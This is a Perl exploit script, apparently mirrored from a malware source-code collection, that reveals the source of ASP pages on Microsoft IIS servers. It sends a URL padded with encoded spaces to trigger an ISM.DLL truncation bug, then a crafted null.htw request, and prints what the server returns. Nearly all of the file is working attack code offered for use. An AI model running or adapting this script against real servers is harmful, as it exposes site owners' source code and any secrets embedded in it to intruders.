mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
86 lines
2.4 KiB
Plaintext
86 lines
2.4 KiB
Plaintext
|
#----------------------------------------------------------------#
|
||
|
# [ISMyASP] #
|
||
|
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
|
||
|
# and null.htw bug #
|
||
|
# LoWNOISE Colombia 5/2000 #
|
||
|
# Efrain 'ET' Torres et@cyberspace.org #
|
||
|
#----------------------------------------------------------------#
|
||
|
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. #
|
||
|
#----------------------------------------------------------------#
|
||
|
# Some f() from wwwboard.pl by S.Sparling #
|
||
|
#----------------------------------------------------------------#
|
||
|
|
||
|
use Socket;
|
||
|
|
||
|
$port=80;
|
||
|
|
||
|
if (!($ARGV[0])) {
|
||
|
print "\n[ISMyASP]\n";
|
||
|
print "$0 http://host/view.asp \n";
|
||
|
print "ET LoWNOISE Colombia.\n";
|
||
|
exit;
|
||
|
}
|
||
|
|
||
|
$url=$ARGV[0];
|
||
|
|
||
|
chop($url) if $url =~ /\n$/;
|
||
|
print "url: $url\n";
|
||
|
|
||
|
$remote = $url;
|
||
|
$remote =~ s/http\:\/\///g;
|
||
|
$remote =~ s/\/([^>]|\n)*//g;
|
||
|
print "host: $remote\n";
|
||
|
|
||
|
$path = $url;
|
||
|
$path =~ s/http\:\/\///g;
|
||
|
$path =~ s/$remote//g;
|
||
|
print "path: $path\n";
|
||
|
|
||
|
|
||
|
$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
|
||
|
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
|
||
|
#READ THE CERBERUS CISADV000327.
|
||
|
|
||
|
$submit = "GET $path";
|
||
|
|
||
|
$i=0;
|
||
|
while($i < $spaces)
|
||
|
{
|
||
|
$submit= "$submit%20";
|
||
|
$i++;
|
||
|
|
||
|
}
|
||
|
$submit= "$submit.htr HTTP/1.0\n\n";
|
||
|
|
||
|
print "======Trying ism.dll buffer truncation...\n";
|
||
|
print "submit: $submit\n\n";
|
||
|
|
||
|
&post_message;
|
||
|
|
||
|
print "======Trying null.htw...\n";
|
||
|
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
|
||
|
print "submit: $submit\n\n";
|
||
|
|
||
|
&post_message;
|
||
|
|
||
|
sub post_message
|
||
|
{
|
||
|
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
|
||
|
die("No port specified.") unless $port;
|
||
|
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
|
||
|
$paddr = sockaddr_in($port, $iaddr);
|
||
|
$proto = getprotobyname('tcp');
|
||
|
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
|
||
|
connect(SOCK, $paddr) || die("Unable to connect: $!");
|
||
|
send(SOCK,$submit,0);
|
||
|
printf "\n======Waiting for reply [pray]....\n\n";
|
||
|
while(<SOCK>) {
|
||
|
print $_;
|
||
|
}
|
||
|
close(SOCK);
|
||
|
}
|
||
|
|
||
|
print "\n\n======THE END. [LoWNOISE]\n";
|
||
|
exit;
|
||
|
#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)
|